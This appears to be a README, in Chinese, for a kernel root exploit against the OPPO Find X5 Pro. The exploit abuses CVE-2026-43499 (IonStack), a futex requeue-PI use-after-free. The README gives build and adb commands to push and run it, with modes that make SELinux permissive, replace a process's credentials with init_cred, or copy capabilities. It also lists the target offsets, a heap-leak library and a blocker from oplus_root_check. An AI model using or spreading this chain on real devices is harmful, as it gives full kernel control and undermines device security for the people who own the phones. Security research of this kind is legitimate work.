GhostLock(CVE-2026-43499 / IonStack)针对 OPPO Find X5 Pro(PFEM10)的研究:漏洞利用链、进展、阻塞日志以及 OPPO 5 系列内核笔记
针对 OPPO Find X5 Pro (PFEM10) 的 CVE-2026-43499 (IonStack) 漏洞利用。
内核 5.10.236-android12-9-o,futex CMP_REQUEUE_PI UAF → pi-tree 写入原语。
使用风险自负。可能会发生 panic / 重启。请勿更新固件。
./build.sh # 需要 Android NDK r28c
构建参数已固定(-O1 / android26)——更改它们会破坏栈几何校准。
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux 宽容模式
adb shell /data/local/tmp/exploit W2 # 子进程 cred -> init_cred
adb shell /data/local/tmp/exploit W5 # 仅 caps 的 cred 复制
跨重启重试:bash run.sh <mode> [attempts]
src/ exploit + payload + offsets (exploit.c, payload.c, pfem10_target.h)
lib/ KernelSnitch 堆泄漏库
model/ rtmutex 链遍历模型(宿主机验证)
oplus_root_check 阻止,仅 caps 路径进行中)CyberMeowfia · IonStack(原始漏洞利用)